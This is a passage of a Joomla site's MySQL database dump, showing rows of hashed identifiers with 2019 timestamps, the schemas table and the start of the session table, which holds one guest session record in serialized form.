(95552, 'adece9c3f48eb99d7ffa3125b5f5bf82', 'c20ddc21eab7b8b5', 0, 2, 1, '2019-05-10 06:24:56'),
(95553, '915a69c0a40bd9ea887d24125723b897', 'dcdc13d025bfd822', 0, 2, 1, '2019-05-10 06:25:04'),
(95554, '6b8d6dccc3ccc50dd30e731e2922d032', '117edd9209c2b7b6', 0, 2, 1, '2019-05-10 06:25:14'),
(95555, 'adece9c3f48eb99d7ffa3125b5f5bf82', 'c20ddc21eab7b8b5', 0, 2, 1, '2019-05-10 06:25:37'),
(95556, 'a0c4d033fe4396653f571b0f2a5e2ae4', '3f8ed3d18087b1dd', 0, 2, 1, '2019-05-10 06:26:08'),
(95557, 'de8c99b0fa7963572de713b747b1615f', '8ad24f4e888a3b80', 0, 2, 1, '2019-05-10 06:26:29'),
(95558, '5b3296344c03c407ef2658f83e5f8430', 'd2372e838b4a80b5', 0, 2, 1, '2019-05-10 06:29:54'),
(95559, '6b8d6dccc3ccc50dd30e731e2922d032', '117edd9209c2b7b6', 0, 2, 1, '2019-05-10 06:39:34'),
(95560, 'a12e2c033902e9e356f053981015c901', 'a4606350cb27c277', 0, 2, 1, '2019-05-10 06:41:02'),
(95561, 'a12e2c033902e9e356f053981015c901', 'a4606350cb27c277', 0, 2, 1, '2019-05-10 06:42:27'),
(95562, '6b8d6dccc3ccc50dd30e731e2922d032', '117edd9209c2b7b6', 0, 2, 1, '2019-05-10 06:45:41'),
(95563, '6b8d6dccc3ccc50dd30e731e2922d032', '117edd9209c2b7b6', 0, 2, 1, '2019-05-10 06:46:25'),
(95564, '9aa3a317459a9934a186311258a51540', 'f19010d8a5f137d0', 0, 2, 1, '2019-05-10 06:48:17'),
(95565, 'a6296738ab66da4bcc3dbcd190643566', '7d6b7e15b603e72f', 0, 2, 1, '2019-05-10 06:53:32'),
(95566, '8d318aa0b6d85e6f794e112b68288a50', 'c82195f7827b9487', 0, 2, 1, '2019-05-10 07:03:10'),
(95567, 'ed8d5eef4088a3efe915a2f32408439d', '0730d6a7ed3a8dd0', 0, 2, 1, '2019-05-10 07:08:20'),
(95568, 'ed8d5eef4088a3efe915a2f32408439d', '0730d6a7ed3a8dd0', 0, 2, 1, '2019-05-10 07:08:23'),
(95569, 'f08eded15adad05d02082cbe574302a3', '575bb5bd01e1327a', 0, 2, 1, '2019-05-10 07:09:09'),
(95570, 'cc966640ffbee6f9b8922478a73aceb9', '78b2ad50a50b68b2', 0, 2, 1, '2019-05-10 07:14:51'),
(95571, '516964d16258cc0eaeb85d0976cc0ecd', '6c8e8fb44d5469ab', 0, 2, 1, '2019-05-10 07:27:06'),
(95572, '9cf70cf7782c0bd22617637ded2fff7b', 'f51f1fc4c4ee5309', 0, 2, 1, '2019-05-10 07:32:58'),
(95573, '9260f841af4017bfe26ae9d58bf452e6', 'e13c478b4e027ae7', 0, 2, 1, '2019-05-10 07:37:56'),
(95574, '9af5a57f7d813d94d6928d1840732e8d', 'ec298f16abca1ffa', 0, 2, 1, '2019-05-10 07:40:35'),
(95575, '9af5a57f7d813d94d6928d1840732e8d', 'ec298f16abca1ffa', 0, 2, 1, '2019-05-10 07:41:46'),
(95576, '240434da7d46b8632a6cd24a4b695749', 'b7114f4357b62774', 0, 2, 1, '2019-05-10 08:05:18'),
(95577, '516964d16258cc0eaeb85d0976cc0ecd', '6c8e8fb44d5469ab', 0, 2, 1, '2019-05-10 08:15:01'),
(95578, 'a89b72082ae936d591252226647042af', '09efcb8d7bf145dc', 0, 2, 1, '2019-05-10 08:15:12'),
(95579, '516964d16258cc0eaeb85d0976cc0ecd', '6c8e8fb44d5469ab', 0, 2, 1, '2019-05-10 08:15:39'),
(95580, 'a20184667bfe02b3656919034a66966e', 'a26b0aaa0303a148', 0, 2, 1, '2019-05-10 08:16:07'),
(95581, 'a20184667bfe02b3656919034a66966e', 'a26b0aaa0303a148', 0, 2, 1, '2019-05-10 08:16:18'),
(95582, 'a20184667bfe02b3656919034a66966e', 'a26b0aaa0303a148', 0, 2, 1, '2019-05-10 08:17:24'),
(95583, 'a4905aa3b9ebb92ba2d17bf5bcf807d9', '13e11844e90f0c3b', 0, 2, 1, '2019-05-10 08:18:35'),
(95584, 'de61a476168b860620fdd48664543644', '1d820d28499c8c31', 0, 2, 1, '2019-05-10 08:20:20'),
(95585, '5ffd2a79be3c0234a1dc680f84d0f09b', '457c57e719458de1', 0, 2, 1, '2019-05-10 08:22:32'),
(95586, '0c856e4cb76330166b63d285c6bb39ad', '4bd7e4551b23e545', 0, 2, 1, '2019-05-10 08:25:58'),
(95587, 'd35e9408f32ae074883369f362afd5ca', '87e2978d1d3d1a07', 0, 2, 1, '2019-05-10 08:41:06'),
(95588, '4f9516e879d12808cb2dc6c76d113eb0', '8cef0fc8f735a41b', 0, 2, 1, '2019-05-10 08:46:31'),
(95589, '5193a6eee6d29c79d957f81ba7019a84', '11f429227cb4041b', 0, 2, 1, '2019-05-10 08:46:32'),
(95590, 'bb9a66cd9a9b530a6546db8e0851aee0', 'ff0625cfddb2c26f', 0, 2, 1, '2019-05-10 08:46:37'),
(95591, '3b199a26cee667d2739b2599492c146a', '744f278c426fcdc4', 0, 2, 1, '2019-05-10 08:46:40'),
(95592, '516964d16258cc0eaeb85d0976cc0ecd', '6c8e8fb44d5469ab', 0, 2, 1, '2019-05-10 08:50:54'),
(95593, 'dce77eaa7d755110d29f452ea6d7d8d4', '22905843105c275f', 0, 2, 1, '2019-05-10 08:58:35'),
(95594, 'dce77eaa7d755110d29f452ea6d7d8d4', '22905843105c275f', 0, 2, 1, '2019-05-10 08:59:16'),
(95595, 'be3e8dfe059c057310346d9a6f0882c7', 'e1eefe92ff5dbc8b', 0, 2, 1, '2019-05-10 09:41:46'),
(95596, 'fa7ccfc8dcac22016bd2d4d84b617281', '1437dc4c2e6c83f3', 0, 2, 1, '2019-05-10 10:00:12'),
(95597, 'fa7ccfc8dcac22016bd2d4d84b617281', '1437dc4c2e6c83f3', 0, 2, 1, '2019-05-10 10:01:43'),
(95598, 'fa7ccfc8dcac22016bd2d4d84b617281', '1437dc4c2e6c83f3', 0, 2, 1, '2019-05-10 10:04:53'),
(95599, 'c74541e6a5808f54fb5fcb7dd1d16c40', '19ac418837a1bfb6', 0, 2, 1, '2019-05-10 10:07:26'),
(95600, 'fa7ccfc8dcac22016bd2d4d84b617281', '1437dc4c2e6c83f3', 0, 2, 1, '2019-05-10 10:08:03'),
(95601, 'e6abfd61055806131711ebc424adf36e', '70eb5503993838b3', 0, 2, 1, '2019-05-10 10:16:29'),
(95602, 'd2d544841607bca92491c9c734956811', '81aa20345d9cca6d', 0, 2, 1, '2019-05-10 10:20:04'),
(95603, 'e6abfd61055806131711ebc424adf36e', '70eb5503993838b3', 0, 2, 1, '2019-05-10 10:20:25'),
(95604, '2e8d22ef9114efd75d6ccbd6df660735', '22905843105c275f', 0, 2, 1, '2019-05-10 10:23:10'),
(95605, '2e8d22ef9114efd75d6ccbd6df660735', '22905843105c275f', 0, 2, 1, '2019-05-10 10:24:52'),
(95606, '240434da7d46b8632a6cd24a4b695749', 'b7114f4357b62774', 0, 2, 1, '2019-05-10 10:35:18'),
(95607, 'caf67aa5ac554e896f7bb398a0717182', 'a8961bedbbb378d3', 0, 2, 1, '2019-05-10 10:40:23'),
(95608, '325cd7ffd4f28610d6b6878743aad115', '56d3ed589a10cd3e', 0, 2, 1, '2019-05-10 10:51:11'),
(95609, '325cd7ffd4f28610d6b6878743aad115', '56d3ed589a10cd3e', 0, 2, 1, '2019-05-10 10:51:19'),
(95610, 'b6c230c20a2fd016daa4bfe6ad25db38', 'fe961668877fa513', 0, 2, 1, '2019-05-10 10:51:32'),
(95611, '325cd7ffd4f28610d6b6878743aad115', '56d3ed589a10cd3e', 0, 2, 1, '2019-05-10 10:51:56'),
(95612, '325cd7ffd4f28610d6b6878743aad115', '56d3ed589a10cd3e', 0, 2, 1, '2019-05-10 10:52:25'),
(95613, 'f394bf0d9f434f2b1816fac6ba93b9c5', 'b9fb01fb143456c5', 0, 2, 1, '2019-05-10 10:53:48'),
(95614, 'e73de68aafa650760c6574e4188883fa', 'c0e3e2bcef9f0f00', 0, 2, 1, '2019-05-10 10:57:56'),
(95615, 'e73de68aafa650760c6574e4188883fa', 'c0e3e2bcef9f0f00', 0, 2, 1, '2019-05-10 10:58:08'),
(95616, 'e73de68aafa650760c6574e4188883fa', 'c0e3e2bcef9f0f00', 0, 2, 1, '2019-05-10 11:03:38'),
(95617, 'e73de68aafa650760c6574e4188883fa', 'c0e3e2bcef9f0f00', 0, 2, 1, '2019-05-10 11:04:42'),
(95618, 'e73de68aafa650760c6574e4188883fa', 'c0e3e2bcef9f0f00', 0, 2, 1, '2019-05-10 11:08:46'),
(95619, 'e73de68aafa650760c6574e4188883fa', 'c0e3e2bcef9f0f00', 0, 2, 1, '2019-05-10 11:10:32'),
(95620, 'a6575ed6b578edbf7f5efc60b6a0a373', '3371af0459389eff', 0, 2, 1, '2019-05-10 11:13:55'),
(95621, '10f12b4a6e93c32fcd59e09a6e2709bb', 'ecd538680cf5133a', 0, 2, 1, '2019-05-10 11:15:46'),
(95622, '10f12b4a6e93c32fcd59e09a6e2709bb', 'ecd538680cf5133a', 0, 2, 1, '2019-05-10 11:17:55'),
(95623, '10f12b4a6e93c32fcd59e09a6e2709bb', 'ecd538680cf5133a', 0, 2, 1, '2019-05-10 11:18:31'),
(95624, '8178483b645b9610614218f8c99344ab', '475653f5180c8243', 0, 2, 1, '2019-05-10 11:35:38'),
(95625, 'b88876ab0cca6a93ae4ac75d245e1b23', '92c89da87db628e2', 0, 2, 1, '2019-05-10 11:55:57'),
(95626, '6e0587ac0add62809f483c3b318082de', 'f8b25c55a9045235', 0, 2, 1, '2019-05-10 12:01:16'),
(95627, '409990643e28cfff19ddbd4d9f307049', '6106751d25ddba21', 0, 2, 1, '2019-05-10 12:08:37'),
(95628, '409990643e28cfff19ddbd4d9f307049', '6106751d25ddba21', 0, 2, 1, '2019-05-10 12:13:54'),
(95629, 'b9539f342b90338a994e13d3af14bdca', 'dfdba71c00a741d9', 0, 2, 1, '2019-05-10 12:27:30'),
(95630, 'd173d3c962e576ffbec056ec234d73b1', 'c6a1f41954f3fc4b', 0, 2, 1, '2019-05-10 12:40:57'),
(95631, '7bcefc9395c9e8082cdd3b6fdadd801a', 'f3d306bbb37e9d26', 0, 2, 1, '2019-05-10 13:09:14'),
(95632, 'd173d3c962e576ffbec056ec234d73b1', 'c6a1f41954f3fc4b', 0, 2, 1, '2019-05-10 13:13:31'),
(95633, 'd173d3c962e576ffbec056ec234d73b1', 'c6a1f41954f3fc4b', 0, 2, 1, '2019-05-10 13:15:51'),
(95634, 'eddb845d715717bdd7b037ea38c59d1d', '75286ab4c49d5946', 0, 2, 1, '2019-05-10 14:38:16'),
(95635, 'eddb845d715717bdd7b037ea38c59d1d', '75286ab4c49d5946', 0, 2, 1, '2019-05-10 14:39:46'),
(95636, 'a4905aa3b9ebb92ba2d17bf5bcf807d9', '13e11844e90f0c3b', 0, 2, 1, '2019-05-10 14:44:36'),
(95637, 'e7cf74564b982df38bde6dc3d8172c82', 'c8515b7bb9416e6e', 0, 2, 1, '2019-05-10 14:45:51'),
(95638, 'a96e3462c3664370b5ce5a6a21eb81ed', '31538da5f921db71', 0, 2, 1, '2019-05-10 14:55:56'),
(95639, '903a4c2aa924f56236afd969d42b4a28', '93e0ffe7e12ab9ba', 0, 2, 1, '2019-05-10 14:57:04'),
(95640, 'c74541e6a5808f54fb5fcb7dd1d16c40', '19ac418837a1bfb6', 0, 2, 1, '2019-05-10 14:57:25'),
(95641, '85d6f8b036067945c79a3316116aeb5c', '5b256f4a57545070', 0, 2, 1, '2019-05-10 15:03:59'),
(95642, '85d6f8b036067945c79a3316116aeb5c', '5b256f4a57545070', 0, 2, 1, '2019-05-10 15:05:49'),
(95643, 'a41b4866ec9e1eb651269f1fa8739962', '5b256f4a57545070', 0, 2, 1, '2019-05-10 15:11:36'),
(95644, 'eb2ad41b809c0e52546e094f4dde73b6', '04b2a9ec17b67009', 0, 2, 1, '2019-05-10 15:13:03'),
(95645, 'a41b4866ec9e1eb651269f1fa8739962', '5b256f4a57545070', 0, 2, 1, '2019-05-10 15:13:04'),
(95646, '924cffdacb1271feb2765e71905120d8', '5b256f4a57545070', 0, 2, 1, '2019-05-10 15:16:11'),
(95647, '924cffdacb1271feb2765e71905120d8', '5b256f4a57545070', 0, 2, 1, '2019-05-10 15:21:43'),
(95648, '5c694e53d5088342a024d0050bfed74f', '93f30eaefda9d8c4', 0, 2, 1, '2019-05-10 15:22:43'),
(95649, 'd35e9408f32ae074883369f362afd5ca', '87e2978d1d3d1a07', 0, 2, 1, '2019-05-10 15:24:48'),
(95650, '5c694e53d5088342a024d0050bfed74f', '93f30eaefda9d8c4', 0, 2, 1, '2019-05-10 15:25:28'),
(95651, '924cffdacb1271feb2765e71905120d8', '5b256f4a57545070', 0, 2, 1, '2019-05-10 15:32:54'),
(95652, 'd35e9408f32ae074883369f362afd5ca', '87e2978d1d3d1a07', 0, 2, 1, '2019-05-10 15:33:35'),
(95653, 'b6bc8ead65d61b702615d6af29417afc', '7d87e59cad0c936d', 0, 2, 1, '2019-05-10 15:34:57'),
(95654, '4673e354280783202a7a85c76afe1aee', '9bd6c23c7090db5b', 0, 2, 1, '2019-05-10 15:46:30'),
(95655, 'f027879e22607da6837dd7543e24a748', '2487dcc4e2703639', 0, 2, 1, '2019-05-10 15:51:38'),
(95656, 'f027879e22607da6837dd7543e24a748', '2487dcc4e2703639', 0, 2, 1, '2019-05-10 15:51:56'),
(95657, '5c694e53d5088342a024d0050bfed74f', '93f30eaefda9d8c4', 0, 2, 1, '2019-05-10 15:54:25'),
(95658, 'd35e9408f32ae074883369f362afd5ca', '87e2978d1d3d1a07', 0, 2, 1, '2019-05-10 15:55:25'),
(95659, 'd35e9408f32ae074883369f362afd5ca', '87e2978d1d3d1a07', 0, 2, 1, '2019-05-10 15:55:45'),
(95660, 'ec7b01d947a977fabaeb79e7b7159174', 'a88c8206896065a3', 0, 2, 1, '2019-05-10 15:59:10'),
(95661, '43f230eddbbbe3c2e0651a6a6ad5ce11', 'b4ecb18ba7992a18', 0, 2, 1, '2019-05-10 15:59:31'),
(95662, 'a6296738ab66da4bcc3dbcd190643566', '7d6b7e15b603e72f', 0, 2, 1, '2019-05-10 15:59:47'),
(95663, 'ec7b01d947a977fabaeb79e7b7159174', 'a88c8206896065a3', 0, 2, 1, '2019-05-10 15:59:59'),
(95664, '961cf94e8462dc50ba1606298f3352b4', 'f979448383d82ed9', 0, 2, 1, '2019-05-10 16:00:25'),
(95665, '961cf94e8462dc50ba1606298f3352b4', 'f979448383d82ed9', 0, 2, 1, '2019-05-10 16:00:28'),
(95666, '961cf94e8462dc50ba1606298f3352b4', 'f979448383d82ed9', 0, 2, 1, '2019-05-10 16:00:41'),
(95667, 'ec7b01d947a977fabaeb79e7b7159174', 'a88c8206896065a3', 0, 2, 1, '2019-05-10 16:00:43'),
(95668, '730c49bc6565e19456fb8ae975eb8b09', 'b2bafb74467116e9', 0, 2, 1, '2019-05-10 16:01:18'),
(95669, '43f230eddbbbe3c2e0651a6a6ad5ce11', 'b4ecb18ba7992a18', 0, 2, 1, '2019-05-10 16:02:36'),
(95670, '961cf94e8462dc50ba1606298f3352b4', 'f979448383d82ed9', 0, 2, 1, '2019-05-10 16:02:47'),
(95671, '961cf94e8462dc50ba1606298f3352b4', 'f979448383d82ed9', 0, 2, 1, '2019-05-10 16:02:50'),
(95672, '8648e427590a93b514402c01b8a369d7', '30c2559ee3528720', 0, 2, 1, '2019-05-10 16:02:56'),
(95673, '961cf94e8462dc50ba1606298f3352b4', 'f979448383d82ed9', 0, 2, 1, '2019-05-10 16:03:01'),
(95674, '2ed24a8a5fca3d72e09defeee497927e', '337cb0f5d908b8b0', 0, 2, 1, '2019-05-10 16:03:02'),
(95675, '2ed24a8a5fca3d72e09defeee497927e', '337cb0f5d908b8b0', 0, 2, 1, '2019-05-10 16:03:09'),
(95676, '90f57eae7801384f47faf3e0af918afe', '65fb1a08fe2b5aab', 0, 2, 1, '2019-05-10 16:03:10'),
(95677, '2ed24a8a5fca3d72e09defeee497927e', '337cb0f5d908b8b0', 0, 2, 1, '2019-05-10 16:03:59'),
(95678, '145178cb2ef15212065112616ee9ce70', '913c1d6747e8d02e', 0, 2, 1, '2019-05-10 16:04:06'),
(95679, '145178cb2ef15212065112616ee9ce70', '913c1d6747e8d02e', 0, 2, 1, '2019-05-10 16:04:20'),
(95680, '90f57eae7801384f47faf3e0af918afe', '65fb1a08fe2b5aab', 0, 2, 1, '2019-05-10 16:04:46'),
(95681, '90f57eae7801384f47faf3e0af918afe', '65fb1a08fe2b5aab', 0, 2, 1, '2019-05-10 16:04:49'),
(95682, '43f230eddbbbe3c2e0651a6a6ad5ce11', 'b4ecb18ba7992a18', 0, 2, 1, '2019-05-10 16:05:00'),
(95683, '33f3eb1de94c91e084bb937cec9b0eed', '2034f09284a4c7ca', 0, 2, 1, '2019-05-10 16:05:19'),
(95684, 'adece9c3f48eb99d7ffa3125b5f5bf82', 'c20ddc21eab7b8b5', 0, 2, 1, '2019-05-10 16:06:13'),
(95685, '90f57eae7801384f47faf3e0af918afe', '65fb1a08fe2b5aab', 0, 2, 1, '2019-05-10 16:06:41'),
(95686, 'bc7a1e406406ea4906ae79d6fea9fade', 'd2372e838b4a80b5', 0, 2, 1, '2019-05-10 16:07:17'),
(95687, '43f230eddbbbe3c2e0651a6a6ad5ce11', 'b4ecb18ba7992a18', 0, 2, 1, '2019-05-10 16:07:41'),
(95688, 'a6296738ab66da4bcc3dbcd190643566', '7d6b7e15b603e72f', 0, 2, 1, '2019-05-10 16:08:14'),
(95689, '5ddceb116ac97d24a138f473d72bd5ad', '7b16863d40230e2a', 0, 2, 1, '2019-05-10 16:08:50'),
(95690, '4673e354280783202a7a85c76afe1aee', '9bd6c23c7090db5b', 0, 2, 1, '2019-05-10 16:09:49'),
(95691, 'b9539f342b90338a994e13d3af14bdca', 'dfdba71c00a741d9', 0, 2, 1, '2019-05-10 16:09:51'),
(95692, 'bc7a1e406406ea4906ae79d6fea9fade', 'd2372e838b4a80b5', 0, 2, 1, '2019-05-10 16:09:58'),
(95693, 'b9539f342b90338a994e13d3af14bdca', 'dfdba71c00a741d9', 0, 2, 1, '2019-05-10 16:10:02'),
(95694, '9a46c2027a5f6e5d2ce6c7753a2fe3c6', '332723ec6654d9f5', 0, 2, 1, '2019-05-10 16:11:03'),
(95695, '730c49bc6565e19456fb8ae975eb8b09', 'b2bafb74467116e9', 0, 2, 1, '2019-05-10 16:11:08'),
(95696, '961cf94e8462dc50ba1606298f3352b4', 'f979448383d82ed9', 0, 2, 1, '2019-05-10 16:12:59'),
(95697, 'c74541e6a5808f54fb5fcb7dd1d16c40', '19ac418837a1bfb6', 0, 2, 1, '2019-05-10 16:13:28'),
(95698, '924cffdacb1271feb2765e71905120d8', '5b256f4a57545070', 0, 2, 1, '2019-05-10 16:13:54'),
(95699, 'be3e8dfe059c057310346d9a6f0882c7', 'e1eefe92ff5dbc8b', 0, 2, 1, '2019-05-10 16:16:07'),
(95700, 'be3e8dfe059c057310346d9a6f0882c7', 'e1eefe92ff5dbc8b', 0, 2, 1, '2019-05-10 16:16:27'),
(95701, 'f74c99134026961b1a8c6865c46155d5', '324d0c5c1f480926', 0, 2, 1, '2019-05-10 16:16:33'),
(95702, '62954fb08023416b6c0eab66ce65c6a5', '8bf4306b09063bb5', 0, 2, 1, '2019-05-10 16:17:13'),
(95703, 'e46de991bdbbdaa512ea081a1837a484', '390c8ebb4f0af7ce', 0, 2, 1, '2019-05-10 16:17:43'),
(95704, '961cf94e8462dc50ba1606298f3352b4', 'f979448383d82ed9', 0, 2, 1, '2019-05-10 16:18:29'),
(95705, 'e46de991bdbbdaa512ea081a1837a484', '390c8ebb4f0af7ce', 0, 2, 1, '2019-05-10 16:19:01'),
(95706, '0458985cff9196150c35cda1ffc7aa65', '24a719142ebf98bf', 0, 2, 1, '2019-05-10 16:19:51'),
(95707, '8d2d960614393b70ae2c8e7bfa914e7d', 'e8a8a053207057db', 0, 2, 1, '2019-05-10 16:20:00'),
(95708, '62954fb08023416b6c0eab66ce65c6a5', '8bf4306b09063bb5', 0, 2, 1, '2019-05-10 16:21:56'),
(95709, '961cf94e8462dc50ba1606298f3352b4', 'f979448383d82ed9', 0, 2, 1, '2019-05-10 16:21:56'),
(95710, '8fc2e830848c551544833f59a400bd55', 'd131b6333aa3bbcb', 0, 2, 1, '2019-05-10 16:22:04'),
(95711, 'c94921acbe7f3b896f182fe48fa8b992', 'ac5479eb6c367132', 0, 2, 1, '2019-05-10 16:22:50'),
(95712, 'c94921acbe7f3b896f182fe48fa8b992', 'ac5479eb6c367132', 0, 2, 1, '2019-05-10 16:23:15'),
(95713, '02d9b1d72a73e8dd030ce48e14a02b13', '34e38ad1bd2cc3de', 0, 2, 1, '2019-05-10 16:24:00'),
(95714, 'c94921acbe7f3b896f182fe48fa8b992', 'ac5479eb6c367132', 0, 2, 1, '2019-05-10 16:24:44'),
(95715, 'd03457e2b0b06c0fb8b3ac9e1bfbe00d', 'd57c6a47a6711062', 0, 2, 1, '2019-05-10 16:24:47'),
(95716, '5c694e53d5088342a024d0050bfed74f', '93f30eaefda9d8c4', 0, 2, 1, '2019-05-10 16:24:47'),
(95717, '90f57eae7801384f47faf3e0af918afe', '65fb1a08fe2b5aab', 0, 2, 1, '2019-05-10 16:24:48'),
(95718, '90f57eae7801384f47faf3e0af918afe', '65fb1a08fe2b5aab', 0, 2, 1, '2019-05-10 16:24:51'),
(95719, '2ed24a8a5fca3d72e09defeee497927e', '337cb0f5d908b8b0', 0, 2, 1, '2019-05-10 16:25:00'),
(95720, '62954fb08023416b6c0eab66ce65c6a5', '8bf4306b09063bb5', 0, 2, 1, '2019-05-10 16:25:12'),
(95721, '2ed24a8a5fca3d72e09defeee497927e', '337cb0f5d908b8b0', 0, 2, 1, '2019-05-10 16:25:14'),
(95722, 'e7993c788381ff42153a9e108878e0d1', 'e39ab1820150f0ad', 0, 2, 1, '2019-05-10 16:25:20'),
(95723, '8fc2e830848c551544833f59a400bd55', 'd131b6333aa3bbcb', 0, 2, 1, '2019-05-10 16:25:44'),
(95724, 'e7993c788381ff42153a9e108878e0d1', 'e39ab1820150f0ad', 0, 2, 1, '2019-05-10 16:25:55'),
(95725, '62954fb08023416b6c0eab66ce65c6a5', '8bf4306b09063bb5', 0, 2, 1, '2019-05-10 16:26:24'),
(95726, 'cd6046a39f30783d8021d5dea1e880f2', '31bc8c8d65d63b7b', 0, 2, 1, '2019-05-10 16:26:38'),
(95727, '924cffdacb1271feb2765e71905120d8', '5b256f4a57545070', 0, 2, 1, '2019-05-10 16:27:41'),
(95728, '6665952adb9e851f9202451d9f7339fd', 'df673342c2c2d34b', 0, 2, 1, '2019-05-10 16:28:44'),
(95729, 'f135bcd29dd13045c0369d7ba7e56fb0', '7d56874efef60535', 0, 2, 1, '2019-05-10 16:28:56'),
(95730, 'bc602d477bbd161a8e6a4538d4f1944a', '7340106347808725', 0, 2, 1, '2019-05-10 16:29:41'),
(95731, 'c6cac3fa8ea2c324f6e1219fa774a9a7', '85c87c6892dfb12d', 0, 2, 1, '2019-05-10 16:29:53'),
(95732, '33f3eb1de94c91e084bb937cec9b0eed', '2034f09284a4c7ca', 0, 2, 1, '2019-05-10 16:29:57'),
(95733, 'c6cac3fa8ea2c324f6e1219fa774a9a7', '85c87c6892dfb12d', 0, 2, 1, '2019-05-10 16:30:10'),
(95734, '961cf94e8462dc50ba1606298f3352b4', 'f979448383d82ed9', 0, 2, 1, '2019-05-10 16:31:31'),
(95735, '2ed24a8a5fca3d72e09defeee497927e', '337cb0f5d908b8b0', 0, 2, 1, '2019-05-10 16:33:31'),
(95736, '5c694e53d5088342a024d0050bfed74f', '93f30eaefda9d8c4', 0, 2, 1, '2019-05-10 16:33:37'),
(95737, '2ed24a8a5fca3d72e09defeee497927e', '337cb0f5d908b8b0', 0, 2, 1, '2019-05-10 16:33:45'),
(95738, 'd4d20722919a7f8050f0c280b8367dbb', '5ff6664a0f430e56', 0, 2, 1, '2019-05-10 16:33:53'),
(95739, 'e13b7b5dc3b5cafff6fda6dc2382f01b', '494698611efddd5a', 0, 2, 1, '2019-05-10 16:34:22'),
(95740, '961cf94e8462dc50ba1606298f3352b4', 'f979448383d82ed9', 0, 2, 1, '2019-05-10 16:34:31'),
(95741, 'e13b7b5dc3b5cafff6fda6dc2382f01b', '494698611efddd5a', 0, 2, 1, '2019-05-10 16:34:35'),
(95742, 'e13b7b5dc3b5cafff6fda6dc2382f01b', '494698611efddd5a', 0, 2, 1, '2019-05-10 16:36:31'),
(95743, '7d90019d71a33c4f62c828d1f6e20761', '2d51200ba62a105e', 0, 2, 1, '2019-05-10 16:39:42'),
(95744, '386450b92e66d4a5c993acdd7537413c', 'dda7fe4fe41f3727', 0, 2, 1, '2019-05-10 16:40:04'),
(95745, '386450b92e66d4a5c993acdd7537413c', 'dda7fe4fe41f3727', 0, 2, 1, '2019-05-10 16:40:40'),
(95746, 'aff4d80c3d56ca9c31934b73fac1877f', 'c55be9d399b9865c', 0, 2, 1, '2019-05-10 16:41:19'),
(95747, 'f135bcd29dd13045c0369d7ba7e56fb0', '7d56874efef60535', 0, 2, 1, '2019-05-10 16:41:34'),
(95748, '5ddceb116ac97d24a138f473d72bd5ad', '7b16863d40230e2a', 0, 2, 1, '2019-05-10 16:42:20'),
(95749, '5c694e53d5088342a024d0050bfed74f', '93f30eaefda9d8c4', 0, 2, 1, '2019-05-10 16:42:22'),
(95750, 'e045225f9512bfc705383783c759854d', 'a30c08bfcb146c2b', 0, 2, 1, '2019-05-10 16:44:16'),
(95751, 'adece9c3f48eb99d7ffa3125b5f5bf82', 'c20ddc21eab7b8b5', 0, 2, 1, '2019-05-10 16:44:37'),
(95752, 'e045225f9512bfc705383783c759854d', 'a30c08bfcb146c2b', 0, 2, 1, '2019-05-10 16:44:38');

-- --------------------------------------------------------

--
-- Table structure for table `y57u5_schemas`
--

CREATE TABLE `y57u5_schemas` (
  `extension_id` int(11) NOT NULL,
  `version_id` varchar(20) COLLATE utf8mb4_unicode_ci NOT NULL
) ENGINE=InnoDB DEFAULT CHARSET=utf8mb4 COLLATE=utf8mb4_unicode_ci;

--
-- Dumping data for table `y57u5_schemas`
--

INSERT INTO `y57u5_schemas` (`extension_id`, `version_id`) VALUES
(700, '3.9.8-2019-06-11'),
(10483, '3.1.1'),
(10544, '3.4.2');

-- --------------------------------------------------------

--
-- Table structure for table `y57u5_session`
--

CREATE TABLE `y57u5_session` (
  `session_id` varbinary(192) NOT NULL,
  `client_id` tinyint(3) UNSIGNED DEFAULT NULL,
  `guest` tinyint(3) UNSIGNED DEFAULT '1',
  `time` int(11) NOT NULL DEFAULT '0',
  `data` mediumtext COLLATE utf8mb4_unicode_ci,
  `userid` int(11) DEFAULT '0',
  `username` varchar(150) COLLATE utf8mb4_unicode_ci DEFAULT ''
) ENGINE=InnoDB DEFAULT CHARSET=utf8mb4 COLLATE=utf8mb4_unicode_ci;

--
-- Dumping data for table `y57u5_session`
--

INSERT INTO `y57u5_session` (`session_id`, `client_id`, `guest`, `time`, `data`, `userid`, `username`) VALUES
(0x3030383262626462636235356632306363383964346232353139643735356631, 0, 1, 1569380233, 'joomla|s:828:\"TzoyNDoiSm9vbWxhXFJlZ2lzdHJ5XFJlZ2lzdHJ5IjozOntzOjc6IgAqAGRhdGEiO086ODoic3RkQ2xhc3MiOjE6e3M6OToiX19kZWZhdWx0IjtPOjg6InN0ZENsYXNzIjozOntzOjc6InNlc3Npb24iO086ODoic3RkQ2xhc3MiOjQ6e3M6NzoiY291bnRlciI7aToxO3M6NToidGltZXIiO086ODoic3RkQ2xhc3MiOjM6e3M6NToic3RhcnQiO2k6MTU2OTM4MDIzMztzOjQ6Imxhc3QiO2k6MTU2OTM4MDIzMztzOjM6Im5vdyI7aToxNTY5MzgwMjMzO31zOjY6ImNsaWVudCI7Tzo4OiJzdGRDbGFzcyI6MTp7czo5OiJmb3J3YXJkZWQiO3M6MTM6IjQ1Ljc5LjIwNy4xMjciO31zOjU6InRva2VuIjtzOjMyOiJhQWpxcmV5RWVTV0xwNUgwaDZ5b0YybTUxM3BiMFk1YiI7fXM6ODoicmVnaXN0cnkiO086MjQ6Ikpvb21sYVxSZWdpc3RyeVxSZWdpc3RyeSI6Mzp7czo3OiIAKgBkYXRhIjtPOjg6InN0ZENsYXNzIjowOnt9czoxNDoiACoAaW5pdGlhbGl6ZWQiO2I6MDtzOjk6InNlcGFyYXRvciI7czoxOiIuIjt9czo0OiJ1c2VyIjtPOjIwOiJKb29tbGFcQ01TXFVzZXJcVXNlciI6MTp7czoyOiJpZCI7aTowO319fXM6MTQ6IgAqAGluaXRpYWxpemVkIjtiOjA7czo5OiJzZXBhcmF0b3IiO3M6MToiLiI7fQ==\";', 0, ''),
